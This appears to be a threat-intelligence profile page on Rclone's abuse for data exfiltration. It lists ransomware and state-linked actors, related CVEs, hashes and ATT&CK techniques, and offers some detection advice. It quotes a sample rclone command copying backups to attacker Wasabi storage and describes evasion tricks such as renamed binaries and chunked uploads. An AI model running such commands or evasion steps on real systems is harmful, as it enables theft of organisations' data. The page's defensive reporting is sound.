rclone
Rclone is a legitimate open-source command-line cloud synchronization and file transfer tool that is frequently abused by threat actors for data exfiltration. The provided content consistently describes its use to transfer stolen data from victim environments to external cloud storage and file-sharing services including Wasabi, MEGA/mega.nz, OneDrive, SharePoint, Dropbox, Google Drive, Amazon S3, SFTP destinations, and other cloud resources. It is repeatedly referenced as a dominant or common exfiltration utility in ransomware and post-compromise operations, including cases involving Qilin affiliates, Akira, BlackCat/ALPHV affiliates, Medusa-associated activity, Storm-1175, MuddyWater/Seedworm, Ember Bear, Indrik Spider, RansomHub, Hunters International, and broader ransomware tradecraft.
Observed behaviors in the content include use of standard or renamed/hidden Rclone binaries for defense evasion, such as crowdstrike.exe and TrendFileSecurityCheck.exe; scripted execution from batch or VBS logic; transfer of large data volumes such as approximately 1 TB within 24 hours in one incident; and targeted exfiltration from internal servers, network shares, backup repositories, and cloud-connected enterprise data stores. In one Microsoft 365-focused intrusion, attackers obtained OAuth consent for an application identified as rclone and used recovered Rclone configuration data containing OneDrive and SharePoint remotes with OAuth 2.0 access and refresh tokens and scopes including Files.ReadWrite.All and Sites.Read.All. In another campaign, Operation CamelClone, attackers delivered a portable Rclone copy (v1.70.3) via spear-phishing and used it to upload desktop documents and Telegram Desktop session data to attacker-controlled MEGA accounts. The content also notes Rclone’s chunker overlay can split large files into smaller chunks during upload to bypass size limits, and that some actors throttle bandwidth during exfiltration.
The content ties Rclone to multiple intrusion contexts and sectors. It was used in ransomware and extortion incidents affecting enterprises and service providers, in attacks against healthcare, finance, education, professional services, transportation, defense, aerospace, government, diplomatic, and nonprofit targets, and in Iranian state-linked activity attributed to MuddyWater/Seedworm. Specific indicators directly mentioned include file hashes 52fda5c1b9704544f32ee98d9060e689 and 51d39aa39478beeac94f2d12f682ecce associated with a campaign where one MD5 matched an Rclone binary. Overall, the content supports high-confidence characterization of Rclone as a widely abused exfiltration utility rather than malware developed solely for malicious use.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2026-50751 is the kind of vulnerability that should make you audit your IKEv1 configurations before you finish reading this sentence... an unauthenticated remote attacker can manipulate the IKEv1 exchange in a way that causes the gateway to accept the session as authenticated without ever verifying a valid user password.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting certain versions of Atlassian Confluence Data Center and Server. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day. | CISA, FBI, and MS-ISAC are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts.
Groups observed using it
11 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Эксфильтрация данных - через Rclone в Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
Эксфильтрация данных - через Rclone в Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
Using the ‘Rclone’ tool, the threat actor exfiltrated a high volume of data from local servers to a cloud file storage service called ‘Wasabi’.
To that aim, Storm-1175 often uses Bandizip to collect files and Rclone for data exfiltration.
Data exfiltration from the on-premises environment is accomplished by using Rclone to transfer the data to the MegaSync public cloud storage service.
"Additional Resources ... Rclone"; "Exfiltration Over C2 Channel (performed by SystemBC and Rclone)"
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Stealth
1 technique
Stealth
adversaries rarely execute tools like MegaCmd or MegaSync under their original filename... you might achieve a good detection outcome by identifying processes based on metadata like their internal name and then alerting when the internal name and the presented process name do not match.
Discovery
1 technique
Discovery
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Collection
6 techniques
Collection
Exfiltration is performed either out of band by the affiliate using third-party tools such as Rclone, MEGA, or WinSCP
The group has been associated with callback phishing, voice phishing, fake IT support workflows, remote monitoring and management tooling, data theft, and follow-on extortion.
Вредонос использует утилиту rclone для кражи данных и автоматически выгружает на серверы операторов документы, фотографии, видео, архивы и другие файлы.
The attackers commonly target document management platforms and cloud storage repositories before exfiltrating the data using tools such as WinSCP or Rclone.
Command and Control
1 technique
Command and Control
Exfiltration
7 techniques
Exfiltration
Victims who refuse to pay face not only locked systems but also the exposure of sensitive corporate records on INC’s data leak site.
AppleSeed has divided files if the size is 0x1000000 bytes or more. APT28 has split archived exfiltration files into chunks smaller than 1MB. APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.
The Akira actors’ primary tools supporting exfiltration include WinRAR, WinSCP, rclone, and MEGA... the actors used rclone to exfiltrate information
For example, in case the chosen method of transfer is over the Domain Name System (DNS) protocol some of the possible tools for usage can be Pulsar or DNSExfiltrator. Additionally, another tool which is used for data exfiltration is the Rclone.
Qilin targets enterprises across multiple sectors, leverages double-extortion (encrypt + exfiltrate)
Monitor for unexpected use of WinSCP, Rclone, cloud storage sync clients, and browser-based file transfer from sensitive systems.
The file stealers PteroVDoor and PteroPSDoor were upgraded to support exfiltration to cloud storage services (Wasabi, Tebi, and Intercolo), which became the primary exfiltration method... PteroBox continued to upload files to Dropbox, and one newer variant used the rclone utility to do so.
IOCs tracked for this family
36 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
53 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source command-line file transfer utility used by attackers for data exfiltration to cloud or remote storage destinations.
Command-line file synchronization and exfiltration tool used here for data theft to cloud storage.
Rclone was used to access Microsoft 365 resources via OAuth tokens and exfiltrate SharePoint and OneDrive data using API-based access.
A file-synchronization utility used by attackers to stage and exfiltrate business-relevant data from internal network locations to external cloud storage.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.